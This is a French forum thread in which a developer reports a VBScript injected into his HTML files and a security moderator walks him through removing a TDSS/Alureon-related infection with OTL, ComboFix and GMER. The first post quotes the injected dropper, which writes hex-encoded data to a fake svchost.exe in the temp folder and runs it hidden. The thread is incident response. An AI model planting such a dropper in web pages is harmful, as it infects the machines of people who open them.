Injection "Script VB" dans mes sources

Fermé
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 - 29 juil. 2010 à 12:19
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 30 juil. 2010 à 17:43
Bonjour,



Bonjour, je suis développeur dans une société, et là, je viens de m'apercevoir que mon poste est "infecté"... la cause !? Aucune idée... je ne vois pas... (pas vu de processus à proprement "suspect" mais bon... il y en a tellement que je n'ai peut être pas fait attention.
Donc, je vous explique, lors de l'appel d'un script php (qui inclut un script html)... tous les fichiers HTML se trouvant dans un répertoire "HTML" se trouve être infecté:
" 
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

"
la ligne WriteData = "..." contient une séquence en Hexa particulièrement longue (probablement un exécutable en héxa)
Bref, j'ai ça dans tous mes scripts html ... (même dans les backups)
Si quelqu'un connait ça... on pourrait m'aider !?

merci beaucoup!
A voir également:

24 réponses

  • 1
  • 2
Réponse 1 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
29 juil. 2010 à 12:23
Salut,

C'est donc dans les sources des sites qui sont sur ton poste ?
Si tu supprimes ces scripts ça revient ?

Tu as des fichiers executables malicieux dans ton site ?


* Télécharge http://www.geekstogo.com/forum/files/file/398-otl-oldtimers-list-it/ sur ton bureau.
(Sous Vista/Win7, il faut cliquer droit sur OTL et choisir Exécuter en tant qu'administrateur)

* Lance OTL
* Sous Peronnalisation, copie-colle ce qu'il y a dans le cadre ci-dessous :
netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%ALLUSERSPROFILE%\Application Data\*.exe /s
%APPDATA%\*.exe /s
%SYSTEMDRIVE%\*.exe
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
CREATERESTOREPOINT
* Clique sur le bouton Quick Scan.
* Quand le scan est fini, utilise le site http://www.cijoint.fr/ pour me donner les deux rapports : OTL.Txt et Extras.Txt.

2
Réponse 2 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 12:27
Mon site (intranet) est pro, pas d'exécutable "malicieux"...
Ils sont pour le moment testé en local sous wamp.

Je te fais ça tout de suite
(lors que tout s'est produit, c'est quand j'ai voulu ouvrir un fichier HTML pour tester une mise en page, par défaut, il a voulu s'ouvrir avec Chrome... mais rien ne s'est passé... (et dans notepad++, le script VB est apparut... piste !?)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
Modifié par Malekal_morte- le 29/07/2010 à 12:30
Mais le code du site est partagé ou il est juste en local sur ta machine ?
Faudrait juste voir si tu vires le script, s'il revient pour voir s'il y a un processus actif sur ta machine qui le remet.
S'il est partagé, ça peux être un autre poste qui remet ça.

Enfin pour l'executable malicieux, bizarre car apparemment le but de script est de faire executer un fichier svchost.exe
0
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 12:41
J'attends que ton outils d'analyse termine, moi de ce que je comprends de ce script VB, c'est qu'il écrit un exécutable a un "emplacement" avec pour nom "svchost.exe"
le WriteData doit bien faire 5000 lignes et il écrit... (donc je ne sais pas trop, je n'ai jamais poussé le VB dans cette direction ;) )
Je te tiens au courant,
En tout cas... merci de ton aide!
(Pour l'exécutable malicieux.... c'est possible, mais je ne sais pas! ^^ )

http://www.cijoint.fr/cjlink.php?file=cj201007/cijzctD0rH.txt
et
http://www.cijoint.fr/cjlink.php?file=cj201007/cijqPzapP2.txt
0
Réponse 3 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
Modifié par Malekal_morte- le 29/07/2010 à 12:52
Tu peux envoyer c:\Program Files\Microsoft\DesktopLayer.exe sur http://upload.malekal.com stp

il faut peut-être afficher les fichiers cachés/systèmes pour voir le fichier.
Je pense que tu sais comment on fait :)

Fais une recherche de fichiers sur QxNFBWBb.exe
et regarde si ça existe aussi.

Rise Against rules :D
0
Réponse 4 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 13:10
Hmmm ton petit appli pour récupérer les fichiers "potentiellement" dangereux me dit que le fichier n'est pas valide... ptètre parce qu'il s'agit d'un executable (et pas une dll... si!?)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
29 juil. 2010 à 13:13
Peut-être est-ce l'antivirus qui bloque l'envoie ? et le fichier fait 0 au final ?
Zip le avec un mot de passe : infected
0
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 13:18
C'est curieux... il est impossible... ne serait-ce que copier cet exécutable (cette ressource est actuellement utilisée par une autre personne... blablabla)
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 13:12
Ou bien parce qu'il est en cours d'utilisation.... et du coup il ne peut pas le "copier"... possible aussi, je vais redémarrer en mode sans échec
0
Réponse 6 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 13:12
QxNFBWBb.exe ==> aucun résultat
0
Réponse 7 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
29 juil. 2010 à 13:33
Laisse tomber, il va se charger en mode sans échec.

Fais ça :

Relance OTL.
o sous Personnalisation, copie_colle le contenu du cadre ci dessous et clic Correction, un rapport apparraitra suite à l'operation que tu conserveras sur clé usb par exemple afin d'en coller le resultat:

:OTL
O20 - HKLM Winlogon: UserInit - (c:\program files\microsoft\desktoplayer.exe) - c:\Program Files\Microsoft\DesktopLayer.exe ()
O33 - MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\Shell\explore\command - "" = F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe -- [2010/07/28 09:56:10 | 000,116,224 | ---- | M] ()
O33 - MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\Shell\Open\command - "" = F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe -- [2010/07/28 09:56:10 | 000,116,224 | ---- | M] ()


* redemarre le pc sous windows et poste le rapport ici


Regrade dans C:\_OTL\MovedFiles si y a pas le fichier dans un sous répertoire avec la date du jour et tu l'upload sur http://upload.malekal.com
0
Réponse 8 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 13:47
Hop, c'est fait!
==============================================>

========== OTL ==========
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\UserInit:c:\program files\microsoft\desktoplayer.exe deleted successfully.
File move failed. c:\Program Files\Microsoft\DesktopLayer.exe scheduled to be moved on reboot.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe moved successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
File F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe not found.

OTL by OldTimer - Version 3.2.9.1 log created on 07292010_133914

Files\Folders moved on Reboot...
c:\Program Files\Microsoft\DesktopLayer.exe moved successfully.

Registry entries deleted on Reboot...

<==============================================
Je t'upload le fichier que tu veux ;)
PS: Au redémarrage de mon PC: Mon antivirus me dit avoir détecté et supprimé un "virus":
ExplorerSrv.exe (dossier WINDOWS)=> Cheval de Troie (c:/WINDOWS/Explorer.exe)
0
Réponse 9 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 13:48
L'envoie du fichier a été effectué avec succès ;)
0
Réponse 10 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
29 juil. 2010 à 13:52
http://www.virustotal.com/fr/analisis/1d00b7ed73689207252437d4aa30611ea0089d13fd31c9706d33019689edacc9-1280404213

Bizarre que ton McAfee n'est pas warn dessus.

Ca fout TDSS/Alueron ....


Sauvegarde tes documents importants.


Désactive les logiciels de protection (Antivirus, Antispywares) puis :

Télécharge Combofix sUBs : http://download.bleepingcomputer.com/sUBs/ComboFix.exe et sauvegarde le sur ton bureau et pas ailleurs!

Double-clic sur combofix, accepte la licence d'utilisation et laisse toi guider.

Eventuellement, installe la console de récupération comme cela est conseillé

Attends que combofix ait terminé, un rapport sera créé. Poste le rapport.
Si le rapport ne passe pas, envoie le sur ce site : http://www.cijoint.fr/
et donne le lien ici :)

Tu as le tutorial sur ce lien pour t'aider : https://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix

PS : si Combofix ne se lance pas, renomme le fichier Combofix et retente.

Si pas mieux, tente en mode sans échec sans prise en charge du réseau : Redémarre en mode sans échec, pour cela, redémarre l'ordinateur, avant le logo Windows, tapote sur la touche F8, un menu va apparaître, choisis Mode sans échec et appuye sur la touche entrée du clavier.
0
Réponse 11 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 14:06
Le rapport de virustotal ne me parle pas beaucoup (La liste que l'on voit, c'est comment est appelée l'infection selon les "antivirus" !?)
Donc ce fichier est bien infecté... c'est ça !?
Alala, j'attends que la copie de mon travail se termine pour lancer "combofix"
je te tiens au courant!

Au fait, je ne sais pas si je l'ai déjà fait... mais merci pour ton aide ;)
0
Réponse 12 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 14:24
Bon.... je recommence la manip !? Le pc a redémarrer en plein milieu...
0
Réponse 13 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
Modifié par Malekal_morte- le 29/07/2010 à 14:29
bha ouaip.

Sinon ouaip DesktopLayer.exe est un malware.
Ca lance un dropper qui installe TDSS/Alueron (un autre malware)
DesktopLayer.exe lance des instances d'Internet Explorer (embedding, tu vois pas la fenetre) qui lance des requetes sur Google.
Surement pour se faire des brousoufs via Alueron.

Parent process:
Path: C:\Program Files\Internet Explorer\iexplore.exe
PID: 4068
Information: Internet Explorer (Microsoft Corporation)
Child process:
Path: C:\Program Files\riva\1280356269.exe
Information: Win32 Cabinet Self-Extractor (Microsoft Corporation)
Command line:"C:\Program Files\riva\1280356269.exe"

On voit d'ailleurs ton répertoire riva dans ton rapport OTL.
Il doit conteinr le dropper avec la suite de chiffre.
Tu peux le virer.

[2010/07/29 09:45:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Application Data\Macromedia
[2010/07/29 08:55:57 | 000,000,000 | ---D | C] -- C:\Program Files\riva


Rise Against rules :D
0
Réponse 14 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 14:34
Ok, je vais voir pour ça...
en par contre, ComboFix... plantage systématique juste après "Recherche des fichiers infectés, ca va prendre 10mn...etc..."
0
Réponse 15 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
29 juil. 2010 à 14:34
Pas cool. T'as bien désactivé Mcafee ?
Tente en mode sans échec.

Si pas mieux :

Télécharge GMER à partir de ce lien : http://www.gmer.net#files - clic sur "Download EXE" et télécharge le fichier sur ton bureau.
Voir le tutorial GMER, ça peut peut-être t'aider : https://www.malekal.com/tutorial-gmer/

Désactive tes logiciels de protection (antivirus, antispyware etc) et ferme tous les programmes ouverts.
Double-clic sur le fichier GMER téléchargé.
[b]IMPORTANT:[/b] Si une alerte de ton antivirus apparaît pour le fichier gmer.sys ou gmer.exe, laisse le s'executer.
Clic sur l'onglet "rootkit"
Laisse tout coché.
Clic sur Scan
Lorsque le scan est terminé, clic sur "Copy"

Ouvre le bloc-note et clic sur le Menu Edition / Coller
Le rapport doit alors apparaître.
Enregistre le fichier sur ton bureau et copie/colle le contenu ici.
0
Réponse 16 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 14:58
En mode sans échec, réussit:

http://www.cijoint.fr/cjlink.php?file=cj201007/cij8jiT8Sb.txt
0
Réponse 17 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
29 juil. 2010 à 15:01
Fais GMER pour voir :)
0
Réponse 18 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 15:02
Juste... pour quelle raison ?
0
Réponse 19 / 24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 670
29 juil. 2010 à 15:04
Pour voir si y a pas TDSS.
Coche les cases à droite sur GMER comme sur ce post : https://forum.malekal.com/viewtopic.php?t=22604&start=

sinon ça va prendre 3 plombes le scan, il va scanner les fichiers et le registre.
0
Réponse 20 / 24
guillaume_74 Messages postés 111 Date d'inscription samedi 18 octobre 2008 Statut Membre Dernière intervention 29 juillet 2010 22
29 juil. 2010 à 15:07
Ok, ben je le ferai demain matin, j'arriverai de bonne heure au travail pour le faire, là, j'ai pas mal de choses à faire, et j'ai pas mal perdu de temps...
Je te tiens au courant,
encore merci!
0

Discussions similaires

recherche script "les visiteurs"
stoukboy -
brucine -

22 réponses
panne tectro sre 703 injection
jacques -
Xileh -

2 réponses
cherche manuel d'utilisation tectro sre 703 i
celinehonrine -
MichMich -

2 réponses